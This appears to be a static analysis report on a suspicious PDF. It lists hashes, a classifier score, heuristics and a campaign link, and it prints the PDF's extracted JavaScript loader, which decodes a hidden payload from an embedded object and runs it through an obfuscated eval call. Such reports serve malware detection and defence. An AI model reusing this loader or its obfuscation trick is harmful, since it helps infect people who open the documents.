PDF static analysis report

Static analysis result for SHA-256 d17b13ebbbca3e75…

SUSPICIOUS

PDF

2.8 KB First seen: 2026-05-04
MD5: 16f7f019f94cb6f301b727982d820b0b SHA-1: 84e093f545d0343ff99a4e7e18a08b82c5f554a9 SHA-256: d17b13ebbbca3e7540858fadbd081d64ac061bfacb771831e4edb8c91a17082b
54 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, which is often used to download and execute further stages of a payload. The embedded JavaScript file 'javascript_obj0007_000.js' is the primary indicator of malicious activity.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 3

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
🗂 Part of campaign: shared payload 1bc4bf38a7 55 samples

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1CC 254 bytes
SHA-256: 1bc4bf38a788adcc495fb84f1f085cb4c62f9f214ddac09c9e3dd447973e35e6
Preview script
First 1,000 lines of the extracted script
ra=this.getDataObjectContents("xampp");rb=util.stringFromStream(ra, "utf-8");rc="";for (i=0;i<rb.length;i +=18){   rc +=rb.charAt(i);}rd="<test><one>ev</one><two>al</two></test>";re=XMLData.parse(rd);        rf=re.one.value+re.two.value;this[rf](rc);